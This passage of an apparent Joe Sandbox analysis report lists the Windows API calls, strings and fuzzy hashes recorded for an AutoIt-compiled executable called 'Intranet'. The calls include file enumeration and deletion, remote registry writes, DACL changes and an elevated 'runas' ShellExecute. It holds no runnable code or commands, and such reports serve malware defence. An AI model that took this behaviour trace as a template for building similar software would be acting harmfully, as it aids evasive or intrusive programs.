                                                                            • Opcode Fuzzy Hash: 8abe59dd7db2774bba4e06ffd5b8e77365f04d31b4a045a3b2d56a3d78a73b87
                                                                            • Instruction Fuzzy Hash: C851B331204301AFE300EF60DC6AFAE7BA8BB94B14F00152EF545D22E1DB7499499B66
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,000BDFBA,?,00000000), ref: 0050F5F9
                                                                            • _wcscmp.LIBCMT ref: 0050F60E
                                                                            • _wcscmp.LIBCMT ref: 0050F625
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0050F637
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0050F651
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0050F669
                                                                            • FindClose.KERNEL32(00000000), ref: 0050F674
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0050F690
                                                                            • _wcscmp.LIBCMT ref: 0050F6B7
                                                                            • _wcscmp.LIBCMT ref: 0050F6CE
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050F6E0
                                                                            • SetCurrentDirectoryW.KERNEL32(0055B578), ref: 0050F6FE
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0050F708
                                                                            • FindClose.KERNEL32(00000000), ref: 0050F715
                                                                            • FindClose.KERNEL32(00000000), ref: 0050F727
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*$SP
                                                                            • API String ID: 1803514871-4017590620
                                                                            • Opcode ID: 72579e1fcade2beafeff30b8b814542a8c755e2183ad9a2caf342dffa5c1882a
                                                                            • Instruction ID: 5fa665488becbc0728f03d2b21bc40975bdd4d1019b4429764afa7aca9ee1f16
                                                                            • Opcode Fuzzy Hash: 72579e1fcade2beafeff30b8b814542a8c755e2183ad9a2caf342dffa5c1882a
                                                                            • Instruction Fuzzy Hash: D231B175641219AADB209FB4DC5DAEF7BACFF19321F144166F805D21E0EB30DA48DB60
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0050CDD0
                                                                            • FindClose.KERNEL32(00000000), ref: 0050CE24
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0050CE49
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0050CE60
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0050CE87
                                                                            • __swprintf.LIBCMT ref: 0050CED3
                                                                            • __swprintf.LIBCMT ref: 0050CF16
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • __swprintf.LIBCMT ref: 0050CF6A
                                                                              • Part of subcall function 004C38C8: __woutput_l.LIBCMT ref: 004C3921
                                                                            • __swprintf.LIBCMT ref: 0050CFB8
                                                                              • Part of subcall function 004C38C8: __flsbuf.LIBCMT ref: 004C3943
                                                                              • Part of subcall function 004C38C8: __flsbuf.LIBCMT ref: 004C395B
                                                                            • __swprintf.LIBCMT ref: 0050D007
                                                                            • __swprintf.LIBCMT ref: 0050D056
                                                                            • __swprintf.LIBCMT ref: 0050D0A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 3953360268-2428617273
                                                                            • Opcode ID: 6c56d2c88dc0a54240abd4414c6dbd10081a23978ae70b9542baba944f570164
                                                                            • Instruction ID: cf6a0401baa72eff906a18f4f7ddbdbed13888a58caa0dda00023408c2868db8
                                                                            • Opcode Fuzzy Hash: 6c56d2c88dc0a54240abd4414c6dbd10081a23978ae70b9542baba944f570164
                                                                            • Instruction Fuzzy Hash: 4AA13BB1404304ABC710EFA5D995DAFB7ECBFD5708F40091EF58586191EB78EA08CB66
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00520FB3
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00530980,00000000,?,00000000,?,?), ref: 00521021
                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00521069
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 005210F2
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00521412
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0052141F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 536824911-966354055
                                                                            • Opcode ID: 9dcb82c1f47a19086c0ce8ffee1e6f478c9c22af55ab44474268055cd321de6d
                                                                            • Instruction ID: f8412982cdcc9c1bfec60c1cbd37de5e5927969a0e4d80d39fb94d094c18981c
                                                                            • Opcode Fuzzy Hash: 9dcb82c1f47a19086c0ce8ffee1e6f478c9c22af55ab44474268055cd321de6d
                                                                            • Instruction Fuzzy Hash: EA028C75200A119FCB14EF25C855E2ABBE5FF99314F04885DF84A9B3A2CB38EC05CB95
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,000BDFBA,?,00000000), ref: 0050F756
                                                                            • _wcscmp.LIBCMT ref: 0050F76B
                                                                            • _wcscmp.LIBCMT ref: 0050F782
                                                                              • Part of subcall function 00504875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00504890
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0050F7B1
                                                                            • FindClose.KERNEL32(00000000), ref: 0050F7BC
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0050F7D8
                                                                            • _wcscmp.LIBCMT ref: 0050F7FF
                                                                            • _wcscmp.LIBCMT ref: 0050F816
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050F828
                                                                            • SetCurrentDirectoryW.KERNEL32(0055B578), ref: 0050F846
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0050F850
                                                                            • FindClose.KERNEL32(00000000), ref: 0050F85D
                                                                            • FindClose.KERNEL32(00000000), ref: 0050F86F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*$jP
                                                                            • API String ID: 1824444939-1128680363
                                                                            • Opcode ID: 5cc675d6ee880f673e4ad2fc03ae2bcfe21d6bddb372deb6353e40c7afafa4a4
                                                                            • Instruction ID: f172295fe0e6c42e2639741262d248ab8b87ecd7b02b5617c59f1da181a2daed
                                                                            • Opcode Fuzzy Hash: 5cc675d6ee880f673e4ad2fc03ae2bcfe21d6bddb372deb6353e40c7afafa4a4
                                                                            • Instruction Fuzzy Hash: 2031F87650131A6ADB24AF74DC58ADF7B6CFF49321F108165F804A21E0E730DE49DB60
                                                                            APIs
                                                                              • Part of subcall function 004F8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,004F8900,?,?,?), ref: 004F8E3C
                                                                              • Part of subcall function 004F8E20: GetLastError.KERNEL32(?,004F8900,?,?,?), ref: 004F8E46
                                                                              • Part of subcall function 004F8E20: GetProcessHeap.KERNEL32(00000008,?,?,004F8900,?,?,?), ref: 004F8E55
                                                                              • Part of subcall function 004F8E20: HeapAlloc.KERNEL32(00000000,?,004F8900,?,?,?), ref: 004F8E5C
                                                                              • Part of subcall function 004F8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,004F8900,?,?,?), ref: 004F8E73
                                                                              • Part of subcall function 004F8EBD: GetProcessHeap.KERNEL32(00000008,004F8916,00000000,00000000,?,004F8916,?), ref: 004F8EC9
                                                                              • Part of subcall function 004F8EBD: HeapAlloc.KERNEL32(00000000,?,004F8916,?), ref: 004F8ED0
                                                                              • Part of subcall function 004F8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004F8916,?), ref: 004F8EE1
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004F8931
                                                                            • _memset.LIBCMT ref: 004F8946
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004F8965
                                                                            • GetLengthSid.ADVAPI32(?), ref: 004F8976
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 004F89B3
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004F89CF
                                                                            • GetLengthSid.ADVAPI32(?), ref: 004F89EC
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004F89FB
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004F8A02
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004F8A23
                                                                            • CopySid.ADVAPI32(00000000), ref: 004F8A2A
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004F8A5B
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004F8A81
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004F8A95
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: d589117398da9c0ef3c64d65c2b1af5947cadc29a0043064ed41157dd235604a
                                                                            • Instruction ID: 52299992c7cd337d35f0361631358385457bd795e2b021cb722f16486666d003
                                                                            • Opcode Fuzzy Hash: d589117398da9c0ef3c64d65c2b1af5947cadc29a0043064ed41157dd235604a
                                                                            • Instruction Fuzzy Hash: 37614775900209EFDF05DFA1DC49EBEBB79FF04304F04812EEA15AA290DB399A14DB64
                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004B526C
                                                                            • IsDebuggerPresent.KERNEL32 ref: 004B527E
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 004B52E6
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                              • Part of subcall function 004ABBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004ABC07
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004B5366
                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 004F0B2E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004F0B66
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00556D10), ref: 004F0BE9
                                                                            • ShellExecuteW.SHELL32(00000000), ref: 004F0BF0
                                                                              • Part of subcall function 004B514C: GetSysColorBrush.USER32(0000000F), ref: 004B5156
                                                                              • Part of subcall function 004B514C: LoadCursorW.USER32(00000000,00007F00), ref: 004B5165
                                                                              • Part of subcall function 004B514C: LoadIconW.USER32(00000063), ref: 004B517C
                                                                              • Part of subcall function 004B514C: LoadIconW.USER32(000000A4), ref: 004B518E
                                                                              • Part of subcall function 004B514C: LoadIconW.USER32(000000A2), ref: 004B51A0
                                                                              • Part of subcall function 004B514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004B51C6
                                                                              • Part of subcall function 004B514C: RegisterClassExW.USER32(?), ref: 004B521C
                                                                              • Part of subcall function 004B50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001,00568290,004B5328), ref: 004B5109
                                                                              • Part of subcall function 004B50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B512A
                                                                              • Part of subcall function 004B50DB: ShowWindow.USER32(00000000), ref: 004B513E
                                                                              • Part of subcall function 004B50DB: ShowWindow.USER32(00000000), ref: 004B5147
                                                                              • Part of subcall function 004B59D3: _memset.LIBCMT ref: 004B59F9
                                                                              • Part of subcall function 004B59D3: Shell_NotifyIconW.SHELL32(00000000,?,?,?,00567A30), ref: 004B5A9E
                                                                            Strings
                                                                            • AutoIt, xrefs: 004F0B23
                                                                            • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 004F0B28
                                                                            • runas, xrefs: 004F0BE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                            • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                            • API String ID: 529118366-2030392706
                                                                            • Opcode ID: e07bcd399e917ed6e8fc31145ac99f3f9ee582e39eb02d6ad9b31ccf5a0463b3
                                                                            • Instruction ID: 50965546488f05445cf328cf4a467153962d7d7af77f912ef06091d66957e8eb
                                                                            • Opcode Fuzzy Hash: e07bcd399e917ed6e8fc31145ac99f3f9ee582e39eb02d6ad9b31ccf5a0463b3
                                                                            • Instruction Fuzzy Hash: D6510B3490424CAACF01ABF5DC35EFEBB74AB59348F10119BF951632A2CBA85509D739
                                                                            APIs
                                                                              • Part of subcall function 0052147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0052040D,?,?), ref: 00521491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00520B0C
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00520BAB
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00520C43
                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00520E82
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00520E8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1240663315-0
                                                                            • Opcode ID: a70fc4daf4ff657908e9aea21f8500827aeb19d18b47f0be8e45bf6b759ff52d
                                                                            • Instruction ID: 8b38527eeba2ba884989b9a9a5bb58e69e129cee0dbe8f03107ecefa13786e24
                                                                            • Opcode Fuzzy Hash: a70fc4daf4ff657908e9aea21f8500827aeb19d18b47f0be8e45bf6b759ff52d
                                                                            • Instruction Fuzzy Hash: 3BE15A31204210AFCB14DF25D995E6EBBE8FF8A314F04896DF44ADB2A2DB34E805CB55
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 00504451
                                                                            • __swprintf.LIBCMT ref: 0050445E
                                                                              • Part of subcall function 004C38C8: __woutput_l.LIBCMT ref: 004C3921
                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00504488
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00504494
                                                                            • LockResource.KERNEL32(00000000), ref: 005044A1
                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 005044C1
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 005044D3
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 005044E2
                                                                            • LockResource.KERNEL32(?), ref: 005044EE
                                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,?,?,00000000), ref: 0050454F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                            • String ID:
                                                                            • API String ID: 1433390588-0
                                                                            • Opcode ID: 619e4fcc438988d342c5f8e852b45e4582d364170439f118a32930a0117e3837
                                                                            • Instruction ID: 985e5d49aea59f4addf84f8175103cf849fb67fa26abd18dbd3b3fbb28185cb4
                                                                            • Opcode Fuzzy Hash: 619e4fcc438988d342c5f8e852b45e4582d364170439f118a32930a0117e3837
                                                                            • Instruction Fuzzy Hash: 37319EB560121AABDB119FA0ED58EBF7FA8FF14301F044425FA12D2290E774DA24DBA0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: 23d6d086c020c4d7bef08b5e3f45caf9036a51038cd60be873dd3065a2372524
                                                                            • Instruction ID: 68335414525c851119ea857f0db3ba52e8149a765be2221dfd1864936c77d0f8
                                                                            • Opcode Fuzzy Hash: 23d6d086c020c4d7bef08b5e3f45caf9036a51038cd60be873dd3065a2372524
                                                                            • Instruction Fuzzy Hash: AE21B735201310AFE701AF25EC59B6E7BA8FF94725F009019F906973A1CB74AD45DF54
                                                                            APIs
                                                                              • Part of subcall function 004C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004B2A58,?,00008000), ref: 004C02A4
                                                                              • Part of subcall function 00504FEC: GetFileAttributesW.KERNEL32(?,00503BFE), ref: 00504FED
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00503D96
                                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00503E3E
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00503E51
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00503E6E
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00503E90
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00503EAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 4002782344-1173974218
                                                                            • Opcode ID: bcfff65fd7f299e1181e6f0759be489b45036af1c02c371e3aaaf499662406f8
                                                                            • Instruction ID: 76e2f427ac0a438f11f11f5c0bb1ad86420dd0333ab082c27d6f236cb7ef3c17
                                                                            • Opcode Fuzzy Hash: bcfff65fd7f299e1181e6f0759be489b45036af1c02c371e3aaaf499662406f8
                                                                            • Instruction Fuzzy Hash: F651617180114D9ACF15EBA1C9A6DEEBB7DAF10304F60426AE442B31E2DB356F0DCB60
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0050FA83
                                                                            • FindClose.KERNEL32(00000000), ref: 0050FB96
                                                                              • Part of subcall function 004A52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,00000002,?,?,?,?,004ABCD4,?,?), ref: 004A52E6
                                                                            • Sleep.KERNEL32(0000000A), ref: 0050FAB3
                                                                            • _wcscmp.LIBCMT ref: 0050FAC7
                                                                            • _wcscmp.LIBCMT ref: 0050FAE2
                                                                            • FindNextFileW.KERNEL32(?,?), ref: 0050FB80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                            • String ID: *.*
                                                                            • API String ID: 2185952417-438819550
                                                                            • Opcode ID: 1dc2f05ff0bba5cfbbaf157236084fb0e25f53667ab2286a43ab43b98db4ab7c
                                                                            • Instruction ID: 1da67dd9638c948a2f53bf776de45256b40f410f9d93b7b1e02ae98c3c03d9a9
